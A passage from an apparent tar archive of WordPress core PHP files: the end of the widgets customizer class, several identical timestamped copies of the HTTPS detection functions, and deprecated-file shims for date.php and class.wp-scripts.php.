$this->sidebar_instance_count[ $index ] += 1;
if ( ! $this->manager->selective_refresh->is_render_partials_request() ) {
printf( "\n<!--dynamic_sidebar_before:%s:%d-->\n", esc_html( $index ), (int) $this->sidebar_instance_count[ $index ] );
}
}
/**
* Finishes keeping track of the current sidebar being rendered.
*
* Inserts a marker after widgets are rendered in a dynamic sidebar.
*
* @since 4.5.0
*
* @param int|string $index Index, name, or ID of the dynamic sidebar.
*/
public function end_dynamic_sidebar( $index ) {
array_shift( $this->current_dynamic_sidebar_id_stack );
if ( ! $this->manager->selective_refresh->is_render_partials_request() ) {
printf( "\n<!--dynamic_sidebar_after:%s:%d-->\n", esc_html( $index ), (int) $this->sidebar_instance_count[ $index ] );
}
}
/**
* Current sidebar being rendered.
*
* @since 4.5.0
* @var string|null
*/
protected $rendering_widget_id;
/**
* Current widget being rendered.
*
* @since 4.5.0
* @var string|null
*/
protected $rendering_sidebar_id;
/**
* Filters sidebars_widgets to ensure the currently-rendered widget is the only widget in the current sidebar.
*
* @since 4.5.0
*
* @param array $sidebars_widgets Sidebars widgets.
* @return array Filtered sidebars widgets.
*/
public function filter_sidebars_widgets_for_rendering_widget( $sidebars_widgets ) {
$sidebars_widgets[ $this->rendering_sidebar_id ] = array( $this->rendering_widget_id );
return $sidebars_widgets;
}
/**
* Renders a specific widget using the supplied sidebar arguments.
*
* @since 4.5.0
*
* @see dynamic_sidebar()
*
* @param WP_Customize_Partial $partial Partial.
* @param array $context {
* Sidebar args supplied as container context.
*
* @type string $sidebar_id ID for sidebar for widget to render into.
* @type int $sidebar_instance_number Disambiguating instance number.
* }
* @return string|false
*/
public function render_widget_partial( $partial, $context ) {
$id_data = $partial->id_data();
$widget_id = array_shift( $id_data['keys'] );
if ( ! is_array( $context )
|| empty( $context['sidebar_id'] )
|| ! is_registered_sidebar( $context['sidebar_id'] )
) {
return false;
}
$this->rendering_sidebar_id = $context['sidebar_id'];
if ( isset( $context['sidebar_instance_number'] ) ) {
$this->context_sidebar_instance_number = (int) $context['sidebar_instance_number'];
}
// Filter sidebars_widgets so that only the queried widget is in the sidebar.
$this->rendering_widget_id = $widget_id;
$filter_callback = array( $this, 'filter_sidebars_widgets_for_rendering_widget' );
add_filter( 'sidebars_widgets', $filter_callback, 1000 );
// Render the widget.
ob_start();
$this->rendering_sidebar_id = $context['sidebar_id'];
dynamic_sidebar( $this->rendering_sidebar_id );
$container = ob_get_clean();
// Reset variables for next partial render.
remove_filter( 'sidebars_widgets', $filter_callback, 1000 );
$this->context_sidebar_instance_number = null;
$this->rendering_sidebar_id = null;
$this->rendering_widget_id = null;
return $container;
}
//
// Option Update Capturing.
//
/**
* List of captured widget option updates.
*
* @since 3.9.0
* @var array $_captured_options Values updated while option capture is happening.
*/
protected $_captured_options = array();
/**
* Whether option capture is currently happening.
*
* @since 3.9.0
* @var bool $_is_current Whether option capture is currently happening or not.
*/
protected $_is_capturing_option_updates = false;
/**
* Determines whether the captured option update should be ignored.
*
* @since 3.9.0
*
* @param string $option_name Option name.
* @return bool Whether the option capture is ignored.
*/
protected function is_option_capture_ignored( $option_name ) {
return ( str_starts_with( $option_name, '_transient_' ) );
}
/**
* Retrieves captured widget option updates.
*
* @since 3.9.0
*
* @return array Array of captured options.
*/
protected function get_captured_options() {
return $this->_captured_options;
}
/**
* Retrieves the option that was captured from being saved.
*
* @since 4.2.0
*
* @param string $option_name Option name.
* @param mixed $default_value Optional. Default value to return if the option does not exist. Default false.
* @return mixed Value set for the option.
*/
protected function get_captured_option( $option_name, $default_value = false ) {
if ( array_key_exists( $option_name, $this->_captured_options ) ) {
$value = $this->_captured_options[ $option_name ];
} else {
$value = $default_value;
}
return $value;
}
/**
* Retrieves the number of captured widget option updates.
*
* @since 3.9.0
*
* @return int Number of updated options.
*/
protected function count_captured_options() {
return count( $this->_captured_options );
}
/**
* Begins keeping track of changes to widget options, caching new values.
*
* @since 3.9.0
*/
protected function start_capturing_option_updates() {
if ( $this->_is_capturing_option_updates ) {
return;
}
$this->_is_capturing_option_updates = true;
add_filter( 'pre_update_option', array( $this, 'capture_filter_pre_update_option' ), 10, 3 );
}
/**
* Pre-filters captured option values before updating.
*
* @since 3.9.0
*
* @param mixed $new_value The new option value.
* @param string $option_name Name of the option.
* @param mixed $old_value The old option value.
* @return mixed Filtered option value.
*/
public function capture_filter_pre_update_option( $new_value, $option_name, $old_value ) {
if ( $this->is_option_capture_ignored( $option_name ) ) {
return $new_value;
}
if ( ! isset( $this->_captured_options[ $option_name ] ) ) {
add_filter( "pre_option_{$option_name}", array( $this, 'capture_filter_pre_get_option' ) );
}
$this->_captured_options[ $option_name ] = $new_value;
return $old_value;
}
/**
* Pre-filters captured option values before retrieving.
*
* @since 3.9.0
*
* @param mixed $value Value to return instead of the option value.
* @return mixed Filtered option value.
*/
public function capture_filter_pre_get_option( $value ) {
$option_name = preg_replace( '/^pre_option_/', '', current_filter() );
if ( isset( $this->_captured_options[ $option_name ] ) ) {
$value = $this->_captured_options[ $option_name ];
/** This filter is documented in wp-includes/option.php */
$value = apply_filters( 'option_' . $option_name, $value, $option_name );
}
return $value;
}
/**
* Undoes any changes to the options since options capture began.
*
* @since 3.9.0
*/
protected function stop_capturing_option_updates() {
if ( ! $this->_is_capturing_option_updates ) {
return;
}
remove_filter( 'pre_update_option', array( $this, 'capture_filter_pre_update_option' ), 10 );
foreach ( array_keys( $this->_captured_options ) as $option_name ) {
remove_filter( "pre_option_{$option_name}", array( $this, 'capture_filter_pre_get_option' ) );
}
$this->_captured_options = array();
$this->_is_capturing_option_updates = false;
}
/**
* {@internal Missing Summary}
*
* See the {@see 'customize_dynamic_setting_args'} filter.
*
* @since 3.9.0
* @deprecated 4.2.0 Deprecated in favor of the {@see 'customize_dynamic_setting_args'} filter.
*/
public function setup_widget_addition_previews() {
_deprecated_function( __METHOD__, '4.2.0', 'customize_dynamic_setting_args' );
}
/**
* {@internal Missing Summary}
*
* See the {@see 'customize_dynamic_setting_args'} filter.
*
* @since 3.9.0
* @deprecated 4.2.0 Deprecated in favor of the {@see 'customize_dynamic_setting_args'} filter.
*/
public function prepreview_added_sidebars_widgets() {
_deprecated_function( __METHOD__, '4.2.0', 'customize_dynamic_setting_args' );
}
/**
* {@internal Missing Summary}
*
* See the {@see 'customize_dynamic_setting_args'} filter.
*
* @since 3.9.0
* @deprecated 4.2.0 Deprecated in favor of the {@see 'customize_dynamic_setting_args'} filter.
*/
public function prepreview_added_widget_instance() {
_deprecated_function( __METHOD__, '4.2.0', 'customize_dynamic_setting_args' );
}
/**
* {@internal Missing Summary}
*
* See the {@see 'customize_dynamic_setting_args'} filter.
*
* @since 3.9.0
* @deprecated 4.2.0 Deprecated in favor of the {@see 'customize_dynamic_setting_args'} filter.
*/
public function remove_prepreview_filters() {
_deprecated_function( __METHOD__, '4.2.0', 'customize_dynamic_setting_args' );
}
}
https-detection-20260605134935-20260621081205-20260621133724.php 0000666 00000013341 15224151220 0014732 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260606165331-20260621081107.php 0000666 00000013341 15224151221 0013343 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605090858-20260621081211.php 0000666 00000013341 15224151221 0013351 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
date.php 0000666 00000000620 15224151221 0006167 0 ustar 00 <?php
/**
* Class for generating SQL clauses that filter a primary query according to date.
*
* This file is deprecated, use 'wp-includes/class-wp-date-query.php' instead.
*
* @deprecated 5.3.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '5.3.0', WPINC . '/class-wp-date-query.php' );
/** WP_Date_Query class */
require_once ABSPATH . WPINC . '/class-wp-date-query.php';
https-detection-20260605120245.php 0000666 00000013341 15224151221 0011754 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class.wp-scripts-20260605035628-20260621162259.php 0000666 00000000527 15224151221 0013462 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* This file is deprecated, use 'wp-includes/class-wp-scripts.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-scripts.php' );
/** WP_Scripts class */
require_once ABSPATH . WPINC . '/class-wp-scripts.php';
https-detection-20260605134935.php 0000666 00000013341 15224151221 0011767 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
